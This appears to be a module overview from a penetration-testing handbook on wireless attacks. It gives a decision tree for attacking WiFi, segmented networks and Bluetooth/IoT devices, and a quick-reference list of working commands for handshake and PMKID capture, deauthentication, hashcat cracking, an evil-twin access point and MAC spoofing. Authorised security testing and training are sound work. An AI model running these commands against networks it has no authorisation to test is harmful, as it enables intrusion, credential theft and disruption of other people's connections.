13 - Wireless Pentesting
#Overview
Wireless pentesting is a cross-cutting domain that spans reconnaissance, exploitation, and lateral movement. WiFi protocols, enterprise network segmentation controls (VLANs, NAC, 802.1X), and short-range wireless technologies (Bluetooth, Zigbee, Z-Wave, SDR) each present distinct attack surfaces that require dedicated tools and methodology.
This module provides attack-focused deep dives into every wireless technology a pentester will encounter. For passive wireless survey and 802.1X inventory (the discovery phase before attacking), see 01 - Pre-Foothold Operations.
The wireless attack surface is often the weakest link in an otherwise hardened perimeter. A single misconfigured AP, a forgotten WPS pin, or an unpatched VLAN trunk can provide the foothold that bypasses firewalls, VPNs, and endpoint detection entirely.
#Decision Tree: Choosing the Right Attack Path
Wireless Target Identified
|
v
Is it a WiFi network?
YES ---> What security type?
| |-- Open/Captive Portal --> Captive Portal Bypass / Client Attacks
| |-- WEP --> WEP Attacks (trivial crack)
| |-- WPA/WPA2 --> PMKID Attack or Handshake Capture + Dictionary
| | |-- PMKID available? --> hcxdumptool + hashcat -m 22000
| | |-- Connected clients? --> Deauth + Handshake Capture
| | |-- WPS enabled? --> WPS PIN Attack (reaver/bully)
| | |-- Enterprise 802.1X? --> EAP Downgrade / Evil Twin
| |
| |-- WPA3-SAE --> Dragonblood / Downgrade / SAE Dictionary
| |-- Hidden SSID --> Probe Request / Deauth to Reveal
|
NO ---> Is it a segmented wired/wireless network?
YES ---> What control type?
| |-- VLAN isolation --> VLAN Hopping
| |-- MAC filtering --> MAC Filtering Bypass
| |-- NAC/802.1X --> NAC Bypass / 802.1X Attacks
| |-- Captive Portal --> Captive Portal Bypass
|
NO ---> Is it Bluetooth/IoT?
YES ---> Bluetooth Attacks / Zigbee-ZWave / SDR
| |-- BT Classic --> Pairing Exploit / Snarfing
| |-- BLE --> GATT Enum / Advertising Spoof
| |-- Zigbee --> KillerBee Replay / Key Extract
| |-- Z-Wave --> Downgrade / Packet Inject
| |-- Sub-GHz RF --> SDR Capture / Replay
|
NO ---> Re-examine target scope
#General Methodology
#1. Passive Reconnaissance (Mandatory First Step)
Before transmitting a single frame, gather intelligence:
# Put adapter in monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Passive survey (no transmission)
sudo airodump-ng wlan0mon --write survey --output-format pcap,csv,netxml
# Identify in-scope BSSIDs
awk -F, 'NR>2 && $1 ~ /:/{gsub(/ /,"",$1); print toupper($1)}' survey-01.csv | sort -u
See 01 - Pre-Foothold Operations for the complete passive survey workflow.
#2. Protocol Identification
From passive captures, identify:
| Beacon Field | Meaning | Attack Path |
|---|---|---|
PRIVACY bit set | WEP or WPA family | Check group cipher |
RSN IE present | WPA2 | Handshake / PMKID |
RSN IE with SAE AKM | WPA3-SAE | Dragonblood / Downgrade |
RSN IE with OWE` | WPA3-OWE | Opportunistic encryption |
WPS IE present | WPS enabled | Pixie Dust / PIN brute |
MFP required | 802.11w mandatory | Deauth may fail |
| EAPOL frames | Enterprise 802.1X | EAP downgrade |
#3. Attack Selection
Match the identified protocol to the appropriate attack technique in the decision tree above. Always start with the least noisy option (PMKID > deauth + handshake > evil twin > WPS brute force).
#4. Credential / Segment Extraction
After a successful wireless attack:
# Test captured credentials against network
nmcli device wifi connect "<SSID>" password "<password>"
# Or via wpa_supplicant
wpa_supplicant -i wlan0 -c /tmp/wpa.conf -B
# Verify network access
ip addr show wlan0
ping -c 3 <gateway>
#5. Lateral Movement
Once on the wireless network, pivot to wired infrastructure:
- VLAN hopping to reach isolated segments
- NAC bypass to persist access across re-authentication
- MAC filtering bypass if the AP restricts by hardware address
- See 09 - Lateral Movement for post-foothold pivoting
#What's in This Section
#Cross-References
- 01 - Pre-Foothold Operations -- Passive wireless survey and 802.1X inventory (the starting point before any active attack)
- 06 - Exploitation & Foothold -- After gaining wireless access, shift to exploitation and post-foothold
- 09 - Lateral Movement -- After VLAN hopping or NAC bypass, move laterally through the wired network
#Quick Reference: Essential Commands
# ── WiFi: Monitor mode setup ──
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# ── WiFi: Passive survey ──
sudo airodump-ng wlan0mon --write survey --output-format pcap,csv
# ── WiFi: PMKID capture (no deauth needed) ──
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active_bids=1
# ── WiFi: WPA handshake capture ──
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP> --write handshake
# ── WiFi: Deauth (if MFP not required) ──
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# ── WiFi: Crack with hashcat ──
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt --rules rockyou
# ── WiFi: Evil twin with eaphammer ──
eaphammer --interface wlan0 --essid "<SSID>" --channel <CH> --auth peap
# ── Network: VLAN discovery ──
sudo vconfig add eth0 <VLAN_ID>
sudo ifconfig eth0.<VLAN_ID> <IP>/<MASK> up
# ── Network: MAC spoofing ──
sudo ifconfig wlan0 down
sudo macchanger -m <TARGET_MAC> wlan0
sudo ifconfig wlan0 up
# ── Bluetooth: Discovery ──
bluelog -i hci0
btscanner -i hci0